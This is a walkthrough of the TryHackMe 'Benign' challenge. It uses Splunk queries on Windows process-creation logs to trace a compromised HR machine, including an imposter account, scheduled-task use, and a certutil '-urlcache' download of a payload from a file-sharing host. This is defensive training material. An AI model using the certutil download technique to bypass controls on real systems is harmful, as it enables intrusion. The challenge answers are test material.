Refer to Benign for the challenge room on TryHackMe
Scenario
One of the client’s Intrusion Detection Systems (IDS) flagged a suspicious process on a computer in the HR department, suggesting it might be compromised. We observed tools related to network information gathering and scheduled tasks running on the affected machine, which confirmed our suspicion. Because of limited resources, we could only collect the process execution logs with Event ID: 4688. We then imported these logs into Splunk using the win_eventlogs index for further investigation.
Network Information
| IT Department | HR department | Marketing department |
| James | Haroon | Bell |
| Moin | Chris | Amelia |
| Katrina | Diana | Deepak |
Activity
How many logs are ingested from the month of March 2022?
In accordance with the scenario, the logs are available in the ‘win_eventlogs’ index. Configure the date range starting from March 1, 2022.
index="win_eventlogs"
Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?
By examining the list of all available usernames, we can identify the imposter account.
index="win_eventlogs"
| dedup UserName
| table UserName
Which user from the HR department was observed to be running scheduled tasks?
By searching for schtasks.exe on the search head, we can identify the executed scheduled tasks. Based on the results, we can identify the user by referencing the department personnel list provided at the beginning.
index="win_eventlogs" schtasks.exe
| dedup UserName
| table UserName ProcessName
Note: schtasks.exe is a Windows utility for creating, deleting, configuring, and displaying scheduled tasks. dedup can eliminate duplicate user entries.
Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host.
By filtering the events using the HR personnel's' username, I identified that a user used the certutil utility to download benign.exe from a file-sharing host.
index="win_eventlogs" UserName="Chris.fort" OR UserName="haroon" OR UserName="Daina"
| dedup ProcessName CommandLine
| table UserName ProcessName CommandLine
Note: option -urlcache allows Certutil to interact with the URL cache.
To bypass the security controls, which system process (lolbin) was used to download a payload from the internet?
The process name is available in the previous screenshot.
What was the date that this binary was executed by the infected host?
By left-clicking the event and select 'View Events,' we can locate the execution date.
Which third-party site was accessed to download the malicious payload?
The host site is identified in the CommandLine from the previous screenshot.
Note: The specific host site provides file hosting and sharing services that are commonly used for uploading and distributing files.
What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?
The downloaded file is in the CommandLine as indicated in the previous screenshot.
The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?
By navigating to the URL found in the CommandLine section of the previous screenshot, we can access the content that was downloaded by the user.
What is the URL that the infected host connected to?
The URL is detailed in the CommandLine section of the event log screenshot.